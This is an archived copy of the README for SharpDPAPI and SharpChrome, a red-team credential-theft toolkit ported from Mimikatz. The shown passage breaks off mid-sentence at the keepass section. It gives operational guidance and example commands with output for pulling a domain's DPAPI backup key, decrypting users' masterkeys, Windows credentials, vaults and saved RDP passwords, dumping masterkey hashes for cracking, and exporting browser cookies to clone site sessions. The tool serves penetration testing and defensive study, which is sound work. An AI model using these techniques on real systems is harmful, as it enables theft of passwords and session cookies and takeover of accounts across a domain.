{ "id": "ff0ef7e1-4d27-4fc6-a265-0dd3c0416f3d", "created_at": "2026-04-06T00:11:06.85469Z", "updated_at": "2026-04-10T03:36:48.445008Z", "deleted_at": null, "sha1_hash": "b284a0a525992ee7cc41d5392553dc1c24ffc2e0", "title": "GitHub - GhostPack/SharpDPAPI: SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 277150, "plain_text": "GitHub - GhostPack/SharpDPAPI: SharpDPAPI is a C# port of\r\nsome Mimikatz DPAPI functionality.\r\nBy leechristensen\r\nArchived: 2026-04-05 17:06:21 UTC\r\nSharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.\r\nI did not come up with this logic, it is simply a port from Mimikatz in order to better understand the\r\nprocess and operationalize it to fit our workflow.\r\nThe SharpChrome subproject is an adaptation of work from @gentilkiwi and @djhohnstein, specifically his\r\nSharpChrome project. However, this version of SharpChrome uses a different version of the C# SQL library that\r\nsupports lockless opening. SharpChrome is built as a separate project in SharpDPAPI because of the size of the\r\nSQLite library utilized.\r\nBoth Chrome and newer Chromium-based Edge browsers can be triaged with SharpChrome.\r\nSharpChrome also uses an minimized version of @AArnott's BCrypt P/Invoke code released under the MIT\r\nLicense.\r\nIf you're unfamiliar with DPAPI, check out this post for more background information. For more information on\r\nCredentials and Vaults in regards to DPAPI, check out Benjamin's wiki entry on the subject.\r\n@harmj0y is the primary author of this port.\r\nSharpDPAPI is licensed under the BSD 3-Clause license.\r\nTable of Contents\r\nSharpDPAPI\r\nTable of Contents\r\nBackground\r\nSharpDPAPI Command Line Usage\r\nSharpChrome Command Line Usage\r\nOperational Usage\r\nSharpDPAPI\r\nSharpChrome\r\nSharpDPAPI Commands\r\nUser Triage\r\nmasterkeys\r\ncredentials\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 1 of 35\n\nvaults\r\nrdg\r\nkeepass\r\ncertificates\r\ntriage\r\nMachine Triage\r\nmachinemasterkeys\r\nmachinecredentials\r\nmachinevaults\r\ncertificates /machine\r\nmachinetriage\r\nMisc\r\nps\r\nblob\r\nbackupkey\r\nsearch\r\nSCCM\r\nSharpChrome Commands\r\nlogins\r\ncookies\r\nstatekeys\r\nbackupkey\r\nCompile Instructions\r\nTargeting other .NET versions\r\nSidenote: Running SharpDPAPI Through PowerShell\r\nSidenote Sidenote: Running SharpDPAPI Over PSRemoting\r\nBackground\r\nSharpDPAPI Command Line Usage\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.20.0\r\nRetrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:\r\n SharpDPAPI backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]\r\nThe *search* comand will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs:\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 2 of 35\n\nsearch /type:registry [/path:HKLM\\path\\to\\key] [/showErrors]\r\n search /type:folder /path:C:\\path\\to\\folder [/maxBytes:\u003cnumOfBytes\u003e] [/showErrors]\r\n search /type:file /path:C:\\path\\to\\file [/maxBytes:\u003cnumOfBytes\u003e]\r\n search /type:base64 [/base:\u003cbase64 string\u003e]\r\nMachine/SYSTEM Triage:\r\n machinemasterkeys - triage all reachable machine masterkey files (elevates to SYSTEM to retrieve the\r\n machinecredentials - use 'machinemasterkeys' and then triage machine Credential files\r\n machinevaults - use 'machinemasterkeys' and then triage machine Vaults\r\n machinetriage - run the 'machinecredentials' and 'machinevaults' commands\r\nUser Triage:\r\n Arguments for the 'masterkeys' command:\r\n /target:FILE/folder - triage a specific masterkey, or a folder full of masterkeys (otherwise triag\r\n /pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable use\r\n /pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterke\r\n /password:X - decrypt the target user's masterkeys using a plaintext password (works remot\r\n /ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)\r\n /credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local\r\n /rpc - decrypt the target user's masterkeys by asking domain controller to do so\r\n /server:SERVER - triage a remote server, assuming admin access\r\n /hashes - output usermasterkey file 'hashes' in JTR/Hashcat format (no decryption)\r\n Arguments for the credentials|vaults|rdg|keepass|triage|blob|ps commands:\r\n Decryption:\r\n /unprotect - force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands\r\n /pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable use\r\n /pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterke\r\n /password:X - decrypt the target user's masterkeys using a plaintext password (works remot\r\n /ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)\r\n /credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local\r\n /rpc - decrypt the target user's masterkeys by asking domain controller to do so\r\n GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption\r\n /mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption\r\n Targeting:\r\n /target:FILE/folder - triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file\r\n /server:SERVER - triage a remote server, assuming admin access\r\n Note: must use with /pvk:KEY or /password:X\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 3 of 35\n\nNote: not applicable to 'blob' or 'ps' commands\r\nCertificate Triage:\r\n Arguments for the 'certificates' command:\r\n /showall - show all decrypted private key files, not just ones\r\n /machine - use the local machine store for certificate triage\r\n /mkfile | /target - for /machine triage\r\n [all decryption args from User Triage above]\r\nNote: in most cases, just use *triage* if you're targeting user DPAPI secrets and *machinetriage* if you're goin\r\n These functions wrap all the other applicable functions that can be automatically run.\r\nSharpChrome Command Line Usage\r\n __ _\r\n (_ |_ _. ._ ._ / |_ ._ _ ._ _ _\r\n __) | | (_| | |_) \\_ | | | (_) | | | (/_\r\n |\r\n v1.9.0\r\nRetrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:\r\n SharpChrome backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]\r\nGlobal arguments for the 'cookies', 'logins', and 'statekeys' commands:\r\n Decryption:\r\n /unprotect - force use of CryptUnprotectData() (default for unprivileged execution)\r\n /pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user ma\r\n /pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys\r\n /password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)\r\n /ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)\r\n /prekey:X - decrypt the target user's masterkeys using a DPAPI prekey (domain or local SHA1,\r\n /rpc - decrypt the target user's masterkeys by asking domain controller to do so\r\n GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption\r\n /statekey:X - a decrypted AES state key (from the 'statekey' command)\r\n Targeting:\r\n /target:FILE - triage a specific 'Cookies', 'Login Data', or 'Local State' file location\r\n /target:C:\\Users\\X\\ - triage a specific user folder for any specified command\r\n /server:SERVER - triage a remote server, assuming admin access (note: must use with /pvk:KEY)\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 4 of 35\n\n/browser:X - triage 'chrome' (default), (chromium-based) 'edge', or 'slack'\r\n Output:\r\n /format:X - either 'csv' (default) or 'table' display\r\n /showall - show Login Data entries with null passwords and expired Cookies instead of filte\r\n /consoleoutfile:X - output all console output to a file on disk\r\n'cookies' command specific arguments:\r\n /cookie:\"REGEX\" - only return cookies where the cookie name matches the supplied regex\r\n /url:\"REGEX\" - only return cookies where the cookie URL matches the supplied regex\r\n /format:json - output cookie values in an EditThisCookie JSON import format. Best when used wit\r\n /setneverexpire - set expirations for cookies output to now + 100 years (for json output)\r\nOperational Usage\r\nSharpDPAPI\r\nOne of the goals with SharpDPAPI is to operationalize Benjamin's DPAPI work in a way that fits with our\r\nworkflow.\r\nHow exactly you use the toolset will depend on what phase of an engagement you're in. In general this breaks into\r\n\"have I compromised the domain or not\".\r\nIf domain admin (or equivalent) privileges have been obtained, the domain DPAPI backup key can be retrieved\r\nwith the backupkey command (or with Mimikatz). This domain private key never changes, and can decrypt any\r\nDPAPI masterkeys for domain users. This means, given a domain DPAPI backup key, an attacker can decrypt\r\nmasterkeys for any domain user that can then be used to decrypt any Vault/Credentials/Chrome Logins/other\r\nDPAPI blobs/etc. The key retrieved from the backupkey command can be used with the masterkeys, credentials,\r\nvaults, rdg, or triage commands.\r\nIf DA privileges have not been achieved, using Mimikatz' sekurlsa::dpapi command will retrieve DPAPI\r\nmasterkey {GUID}:SHA1 mappings of any loaded master keys (user and SYSTEM) on a given system (tip:\r\nrunning dpapi::cache after key extraction will give you a nice table). If you change these keys to a\r\n{GUID1}:SHA1 {GUID2}:SHA1... type format, they can be supplied to the credentials, vaults, rdg, or triage\r\ncommands. This lets you triage all Credential files/Vaults on a system for any user who's currently logged in,\r\nwithout having to do file-by-file decrypts.\r\nAlternatively, if you can supply a target user's password, NTLM hash, or DPAPI prekey for user-command with\r\n/password:X , /ntlm:X , or /prekey:X respectively. The dpapi field of Mimikatz' sekurlsa::msv output for\r\ndomain users can be used as the /prekey , while the sha1 field of sekurlsa::msv output can be used as the\r\n/prekey for local users.\r\nFor decrypting RDG/RDCMan.settings files with the rdg command, the /unprotect flag will use\r\nCryptUnprotectData() to decrypt any saved RDP passwords, if the command is run from the user context who\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 5 of 35\n\nsaved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why\r\nthis approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nFor machine-specific DPAPI triage, the machinemasterkeys|machinecredentials|machinevaults|machinetriage\r\ncommands will do the machine equivalent of user DPAPI triage. If in an elevated context (that is, you need local\r\nadministrative rights), SharpDPAPI will elevate to SYSTEM privileges to retrieve the \"DPAPI_SYSTEM\" LSA\r\nsecret, which is then used to decrypt any discovered machine DPAPI masterkeys. These keys are then used as\r\nlookup tables for machine credentials/vaults/etc.\r\nFor more offensive DPAPI information, check here.\r\nSharpChrome\r\nSharpChrome is a Chrome-specific implementation of SharpDPAPI capable of cookies and logins\r\ndecryption/triage. It is built as a separate project in SharpDPAPI because of the size of the SQLite library utilized.\r\nSince Chrome Cookies/Login Data are saved without CRYPTPROTECT_SYSTEM, CryptUnprotectData() is\r\nback on the table. If SharpChrome is run from an unelevated contect, it will attempt to decrypt any logins/cookies\r\nfor the current user using CryptUnprotectData(). A /pvk:[BASE64|file.pvk] , {GUID}:SHA1 lookup table,\r\n/password:X , /ntlm:X , /prekey:X , or /mkfile:FILE of {GUID}:SHA1 values can also be used to decrypt\r\nvalues. Also, the C# SQL library used (with a few modifications) supports lockless opening, meaning that Chrome\r\ndoes not have to be closed/target files do not have to be copied to another location.\r\nAlternatively, if you can supply a target user's password, NTLM hash, or DPAPI prekey for user-command with\r\n/password:X , /ntlm:X , or /prekey:X respectively. The dpapi field of Mimikatz' sekurlsa::msv output for\r\ndomain users can be used as the /prekey , while the sha1 field of sekurlsa::msv output can be used as the\r\n/prekey for local users.\r\nIf Chrome is version 80+, an AES state key is stored in AppData\\Local\\Google\\Chrome\\User Data\\Local State -\r\nthis key is protected with DPAPI, so we can use CryptUnprotectData()/pvk/masterkey lookup tables to decrypt it.\r\nThis AES key is then used to protect new cookie and login data entries. This is also the process when\r\n/browser:edge or /browser:brave is specified, for newer Chromium-based Edge browser triage.\r\nBy default, cookies and logins are displayed as a csv - this can be changed with /format:table for table output,\r\nand /format:json for cookies specifically. The json option outputs cookies in a json format that can be imported\r\ninto the EditThisCookie Chrome extension for easy reuse.\r\nThe cookies command also has /cookie:REGEX and /url:REGEX arguments to only return cookie names or urls\r\nmatching the supplied regex. This is useful with /format:json to easily clone access to specific sites.\r\nSpecific cookies/logins/statekey files can be specified with /target:X , and a user folder can be specified with\r\n/target:C:\\Users\\USER\\ for any triage command.\r\nSharpDPAPI Commands\r\nUser Triage\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 6 of 35\n\nmasterkeys\r\nThe masterkeys command will search for any readable user masterkey files and decrypt them using a supplied\r\ndomain DPAPI backup key. It will return a set of masterkey {GUID}:SHA1 mappings.\r\n/password:X can be used to decrypt a user's current masterkeys. Note that for domain-joined machines, the\r\npassword can be supplied in either plaintext or NTLM format. If /target is also supplied with /password , the\r\n/sid:X full domain SID of the user also needs to be specified.\r\nThe domain backup key can be in base64 form ( /pvk:BASE64... ) or file form ( /pvk:key.pvk ).\r\nC:\\Temp\u003eSharpDPAPI.exe masterkeys /pvk:key.pvk\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Triage User Masterkey Files\r\n[*] Found MasterKey : C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1473254003-2681465353-4059813368\r\n[*] Found MasterKey : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-883232822-274137685-4173207997\r\n...(snip)...\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316...(snip)...\r\n...(snip)...\r\nIf no /pasword or /pvk is specified, you may pass the /hashes flag to dump the master key hashes in\r\nJohn/Hashcat format. In this mode, the hashes are printed in the format of {GUID}:DPAPImk .\r\nThe Preferred key is also parsed in order to highlight the current preferred master key, so that effort is not spent\r\ncracking older keys.\r\nC:\\Temp\u003eSharpDPAPI.exe masterkeys /hashes\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.11.3\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 7 of 35\n\n[*] Action: User DPAPI Masterkey File Triage\r\n[*] Will dump user masterkey hashes\r\n[*] Found MasterKey : C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1473254003-2681465353-4059813368\r\n[*] Found MasterKey : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-883232822-274137685-4173207997\r\n...(snip)...\r\n[*] Preferred master keys:\r\nC:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1473254003-2681465353-4059813368-1000\\28678d89-678a-40\r\nC:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-883232822-274137685-4173207997-1111\\3858b304-37e5-48\r\n[*] User master key hashes:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:$DPAPImk$1*3*S-1-5-21-1473254003-2681465353-4059813368-1000*des3*sha1*180\r\ncredentials\r\nThe credentials command will search for Credential files and either a) decrypt them with any \"{GUID}:SHA1\"\r\nmasterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied\r\nDPAPI domain backup key ( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys (a la\r\nmasterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption\r\ntable. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command.\r\nA specific credential file (or folder of credentials) can be specified with /target:FILE or /target:C:\\Folder\\ .\r\nIf a file is specified, {GUID}:SHA1 values are required, and if a folder is specified either a) {GUID}:SHA1\r\nvalues must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be\r\nsupplied.\r\nIf run from an elevated context, Credential files for ALL users will be triaged, otherwise only Credential files for\r\nthe current user will be processed.\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {fe\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Credential Triage\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 8 of 35\n\n[*] Triaging Credentials for ALL users\r\nFolder : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Credentials\\\r\n CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB\r\n guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}\r\n size : 436\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description : Local Credential Data\r\n LastWritten : 1/22/2019 2:44:40 AM\r\n TargetName : Domain:target=TERMSRV/10.4.10.101\r\n TargetAlias :\r\n Comment :\r\n UserName : DOMAIN\\user\r\n Credential : Password!\r\n ...(snip)...\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Credential Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Triaging Credentials for ALL users\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 9 of 35\n\nFolder : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Credentials\\\r\n CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB\r\n guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}\r\n size : 436\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description : Local Credential Data\r\n LastWritten : 1/22/2019 2:44:40 AM\r\n TargetName : Domain:target=TERMSRV/10.4.10.101\r\n TargetAlias :\r\n Comment :\r\n UserName : DOMAIN\\user\r\n Credential : Password!\r\n...(snip)...\r\nvaults\r\nThe vaults command will search for Vaults and either a) decrypt them with any \"{GUID}:SHA1\" masterkeys\r\npassed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain\r\nbackup key ( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a\r\n/password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID\r\nmappings can be recovered with Mimikatz' sekurlsa::dpapi command.\r\nThe Policy.vpol folder in the Vault folder is decrypted with any supplied DPAPI keys to retrieve the associated\r\nAES decryption keys, which are then used to decrypt any associated .vcrd files.\r\nA specific vault folder can be specified with /target:C:\\Folder\\ . In this case, either a) {GUID}:SHA1 values\r\nmust be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be\r\nsupplied.\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe vaults {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b2\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Vault Triage\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 10 of 35\n\n[*] Triaging Vaults for ALL users\r\n[*] Triaging Vault folder: C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}\r\n size : 240\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description :\r\n aes128 key : EDB42294C0721F2F1638A40F0CD67CD8\r\n aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793\r\n LastWritten : 10/12/2018 12:10:42 PM\r\n FriendlyName : Internet Explorer\r\n Identity : admin\r\n Resource : https://10.0.0.1/\r\n Authenticator : Password!\r\n...(snip)...\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: DPAPI Vault Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Triaging Vaults for ALL users\r\n[*] Triaging Vault folder: C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 11 of 35\n\nVaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}\r\n size : 240\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description :\r\n aes128 key : EDB42294C0721F2F1638A40F0CD67CD8\r\n aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793\r\n LastWritten : 10/12/2018 12:10:42 PM\r\n FriendlyName : Internet Explorer\r\n Identity : admin\r\n Resource : https://10.0.0.1/\r\n Authenticator : Password!\r\n...(snip)...\r\nUsing a domain DPAPI backup key with a folder specified (i.e. \"offline\" triage):\r\nC:\\Temp\u003eSharpDPAPI.exe vaults /target:C:\\Temp\\test\\ /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: User DPAPI Vault Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Target Vault Folder: C:\\Temp\\test\\\r\n[*] Triaging Vault folder: C:\\Temp\\test\\\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 12 of 35\n\nguidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}\r\n size : 240\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32772/26115\r\n description :\r\n aes128 key : EDB42294C0721F2F1638A40F0CD67CD8\r\n aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793\r\n LastWritten : 3/20/2019 6:03:50 AM\r\n FriendlyName : Internet Explorer\r\n Identity : account\r\n Resource : http://www.abc.com/\r\n Authenticator : password\r\nrdg\r\nThe rdg command will search for RDCMan.settings files for the current user (or if elevated, all users) and either\r\na) decrypt them with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one or more\r\n{GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt any saved RDP passwords, if the command is run\r\nfrom the user context who saved the passwords. This can be done from an unprivileged context, without the need\r\nto touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nA specific RDCMan.settings file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or\r\n/target:C:\\Folder\\ . If a file is specified, {GUID}:SHA1 values (or /unprotect ) are required, and if a folder\r\nis specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and\r\na /pvk domain backup key must be supplied.\r\nThis command will decrypt any saved password information from both the RDCMan.settings file and any .RDG\r\nfiles referenced by the RDCMan.settings file.\r\nUsing /unprotect to decrypt any found passwords:\r\nC:\\Temp\u003eSharpDPAPI.exe rdg /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.3.0\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 13 of 35\n\n[*] Action: RDG Triage\r\n[*] Using CryptUnprotectData() to decrypt RDG passwords\r\n[*] Triaging RDCMan Settings Files for current user\r\n RDCManFile : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\r\n Accessed : 5/9/2019 11:52:58 AM\r\n Modified : 5/9/2019 11:52:58 AM\r\n Recent Server : test\\primary.testlab.local\r\n Cred Profiles\r\n Profile Name : testprofile\r\n UserName : testlab.local\\dfm\r\n Password : Password123!\r\n Default Logon Credentials\r\n Profile Name : Custom\r\n UserName : TESTLAB\\harmj0y\r\n Password : Password123!\r\n C:\\Users\\harmj0y\\Documents\\test.rdg\r\n Servers\r\n Name : secondary.testlab.local\r\n Name : primary.testlab.local\r\n Profile Name : Custom\r\n UserName : TESTLAB\\dfm.a\r\n Password : Password123!\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe rdg {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.3.0\r\n[*] Action: RDG Triage\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 14 of 35\n\n[*] Using CryptUnprotectData() to decrypt RDG passwords\r\n[*] Triaging RDCMan Settings Files for current user\r\n RDCManFile : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\r\n Accessed : 5/9/2019 11:52:58 AM\r\n Modified : 5/9/2019 11:52:58 AM\r\n Recent Server : test\\primary.testlab.local\r\n Cred Profiles\r\n Profile Name : testprofile\r\n UserName : testlab.local\\dfm\r\n Password : Password123!\r\n Default Logon Credentials\r\n Profile Name : Custom\r\n UserName : TESTLAB\\harmj0y\r\n Password : Password123!\r\n C:\\Users\\harmj0y\\Documents\\test.rdg\r\n Servers\r\n Name : secondary.testlab.local\r\n Name : primary.testlab.local\r\n Profile Name : Custom\r\n UserName : TESTLAB\\dfm.a\r\n Password : Password123!\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe rdg /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.3.0\r\n[*] Action: RDG Triage\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 15 of 35\n\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665\r\n...(snip)...\r\n[*] Triaging RDCMan.settings Files for ALL users\r\n RDCManFile : C:\\Users\\harmj0y\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings\r\n Accessed : 5/9/2019 11:52:58 AM\r\n Modified : 5/9/2019 11:52:58 AM\r\n Recent Server : test\\primary.testlab.local\r\n Cred Profiles\r\n Profile Name : testprofile\r\n UserName : testlab.local\\dfm.a\r\n Password : Password123!\r\n Default Logon Credentials\r\n Profile Name : Custom\r\n UserName : TESTLAB\\harmj0y\r\n Password : Password123!\r\n C:\\Users\\harmj0y\\Documents\\test.rdg\r\n Servers\r\n Name : secondary.testlab.local\r\n Name : primary.testlab.local\r\n Profile Name : Custom\r\n UserName : TESTLAB\\dfm.a\r\n Password : Password123!\r\nkeepass\r\nThe keepass command will search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all\r\nusers) and either a) decrypt them with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one or\r\nmore {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 16 of 35\n\nThe /unprotect 